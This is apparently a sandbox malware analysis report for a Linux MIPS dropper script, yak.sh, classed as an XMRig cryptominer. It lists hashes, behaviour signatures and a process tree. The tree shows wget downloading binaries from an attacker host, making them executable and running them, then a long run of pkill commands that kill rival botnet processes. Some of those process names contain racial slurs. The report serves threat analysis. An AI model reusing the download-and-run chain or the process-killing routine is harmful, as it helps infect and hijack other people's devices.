Analysis
-
max time kernel
150s -
max time network
125s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
23-11-2024 23:57
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
linux-it.abuser.eu - Port:
21 - Username:
anonymous - Password:
[email protected]
Signatures
-
XMRig Miner payload 2 IoCs
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (4428) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 2 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
-
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵
-
/usr/bin/pkillpkill -9 902i134⤵
-
-
/bin/busyboxbusybox pkill -9 902i134⤵
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵
-
/usr/bin/pkillpkill -9 fdevalvex4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵
-
/usr/bin/pkillpkill -9 scanspc4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵
-
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵
-
/usr/bin/pkillpkill -9 scanx864⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵
-
/usr/bin/pkillpkill -9 freecookiex864⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵
-
/usr/bin/pkillpkill -9 sysgpu4⤵
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵
-
/usr/bin/pkillpkill -9 frgege4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵
-
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵
-
/usr/bin/pkillpkill -9 frgreu4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵
-
/usr/bin/pkillpkill -9 telnetd4⤵
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵
-
/usr/bin/pkillpkill -9 0x766f69644⤵
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵
-
/usr/bin/pkillpkill -9 OaF34⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵
-
/usr/bin/pkillpkill -9 geae4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 geae4⤵
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵
-
/usr/bin/pkillpkill -9 vaiolmao4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵
-
/usr/bin/pkillpkill -9 123123a4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵
-
/usr/bin/pkillpkill -9 ggTrex4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵
-
/usr/bin/pkillpkill -9 wasads4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵
-
/usr/bin/pkillpkill -9 ggt4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵
-
/usr/bin/pkillpkill -9 wget-log4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵
-
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵
-
/usr/bin/pkillpkill -9 ggtr4⤵
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵
-
/usr/bin/pkillpkill -9 14Fa4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵
-
/usr/bin/pkillpkill -9 ggtt4⤵
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵
-
/usr/bin/pkillpkill -9 haetrghbr4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵
-
/usr/bin/pkillpkill -9 19ju3d4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵
-
/usr/bin/pkillpkill -9 hehahejeje924⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵
-
/usr/bin/pkillpkill -9 SlaVLav124⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵
-
/usr/bin/pkillpkill -9 5Gbf4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵
-
/usr/bin/pkillpkill -9 iaGv4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵
-
/usr/bin/pkillpkill -9 5aA34⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵
-
/usr/bin/pkillpkill -9 insomni4⤵
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵
-
/usr/bin/pkillpkill -9 6402774⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 6402774⤵
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
-
/usr/bin/pkillpkill -9 ipcamCache4⤵
- Reads CPU attributes
- System Network Configuration Discovery
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵
-
/usr/bin/pkillpkill -9 T4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 T4⤵
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵
-
/usr/bin/pkillpkill -9 6ke34⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵
-
/usr/bin/pkillpkill -9 TOKYO34⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 lyEeaXul2dULCVxh4⤵
-
-
-
/bin/shsh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"3⤵
-
/usr/bin/pkillpkill -9 93OfjHZ2z4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 93OfjHZ2z4⤵
-
-
-
/bin/shsh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"3⤵
-
/usr/bin/pkillpkill -9 TY2gD6MZvKc7KU6r4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 TY2gD6MZvKc7KU6r4⤵
-
-
-
/bin/shsh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"3⤵
-
/usr/bin/pkillpkill -9 mMkiy6f87l4⤵
-
-
/bin/busyboxbusybox pkill -9 mMkiy6f87l4⤵
-
-
-
/bin/shsh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"3⤵
-
/usr/bin/pkillpkill -9 A023UU4U24UIU4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 A023UU4U24UIU4⤵
-
-
-
/bin/shsh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"3⤵
-
/usr/bin/pkillpkill -9 TheWeeknd4⤵
-
-
/bin/busyboxbusybox pkill -9 TheWeeknd4⤵
-
-
-
/bin/shsh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"3⤵
-
/usr/bin/pkillpkill -9 mioribitches4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 mioribitches4⤵
-
-
-
/bin/shsh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"3⤵
-
/usr/bin/pkillpkill -9 A5p94⤵
-
-
/bin/busyboxbusybox pkill -9 A5p94⤵
-
-
-
/bin/shsh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"3⤵
-
/usr/bin/pkillpkill -9 TheWeeknds4⤵
-
-
/bin/busyboxbusybox pkill -9 TheWeeknds4⤵
-
-
-
/bin/shsh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"3⤵
-
/usr/bin/pkillpkill -9 mnblkjpoi4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 mnblkjpoi4⤵
-
-
-
/bin/shsh -c "pkill -9 AbAd || busybox pkill -9 AbAd"3⤵
-
/usr/bin/pkillpkill -9 AbAd4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 AbAd4⤵
-
-
-
/bin/shsh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"3⤵
-
/usr/bin/pkillpkill -9 Tokyos4⤵
-
-
/bin/busyboxbusybox pkill -9 Tokyos4⤵
-
-
-
/bin/shsh -c "pkill -9 neb || busybox pkill -9 neb"3⤵
-
/usr/bin/pkillpkill -9 neb4⤵
-
-
/bin/busyboxbusybox pkill -9 neb4⤵
-
-
-
/bin/shsh -c "pkill -9 Akiru || busybox pkill -9 Akiru"3⤵
-
/usr/bin/pkillpkill -9 Akiru4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 Akiru4⤵
-
-
-
/bin/shsh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"3⤵
-
/usr/bin/pkillpkill -9 U8inTz4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 U8inTz4⤵
-
-
-
/bin/shsh -c "pkill -9 netstats || busybox pkill -9 netstats"3⤵
-
/usr/bin/pkillpkill -9 netstats4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 netstats4⤵
-
-
-
/bin/shsh -c "pkill -9 Alex || busybox pkill -9 Alex"3⤵
-
/usr/bin/pkillpkill -9 Alex4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 Alex4⤵
-
-
-
/bin/shsh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"3⤵
-
/usr/bin/pkillpkill -9 W9RCAKM20T4⤵
-
-
/bin/busyboxbusybox pkill -9 W9RCAKM20T4⤵
-
-
-
/bin/shsh -c "pkill -9 newnetword || busybox pkill -9 newnetword"3⤵
-
/usr/bin/pkillpkill -9 newnetword4⤵
-
-
/bin/busyboxbusybox pkill -9 newnetword4⤵
-
-
-
/bin/shsh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"3⤵
-
/usr/bin/pkillpkill -9 Ayo2154⤵
-
-
/bin/busyboxbusybox pkill -9 Ayo2154⤵
-
-
-
/bin/shsh -c "pkill -9 Word || busybox pkill -9 Word"3⤵
-
/usr/bin/pkillpkill -9 Word4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Word4⤵
-
-
-
/bin/shsh -c "pkill -9 nloads || busybox pkill -9 nloads"3⤵
-
/usr/bin/pkillpkill -9 nloads4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 nloads4⤵
-
-
-
/bin/shsh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"3⤵
-
/usr/bin/pkillpkill -9 BAdAsV4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 BAdAsV4⤵
-
-
-
/bin/shsh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"3⤵
-
/usr/bin/pkillpkill -9 Wordmane4⤵
-
-
/bin/busyboxbusybox pkill -9 Wordmane4⤵
-
-
-
/bin/shsh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"3⤵
-
/usr/bin/pkillpkill -9 notyakuzaa4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 notyakuzaa4⤵
-
-
-
/bin/shsh -c "pkill -9 Belch || busybox pkill -9 Belch"3⤵
-
/usr/bin/pkillpkill -9 Belch4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Belch4⤵
-
-
-
/bin/shsh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"3⤵
-
/usr/bin/pkillpkill -9 Wordnets4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Wordnets4⤵
-
-
-
/bin/shsh -c "pkill -9 obp || busybox pkill -9 obp"3⤵
-
/usr/bin/pkillpkill -9 obp4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 obp4⤵
-
-
-
/bin/shsh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"3⤵
-
/usr/bin/pkillpkill -9 BigN0gg0r4204⤵
-
-
/bin/busyboxbusybox pkill -9 BigN0gg0r4204⤵
-
-
-
/bin/shsh -c "pkill -9 X0102I34f || busybox pkill -9 X0102I34f"3⤵
-
/usr/bin/pkillpkill -9 X0102I34f4⤵
-
-
/bin/busyboxbusybox pkill -9 X0102I34f4⤵
-
-
-
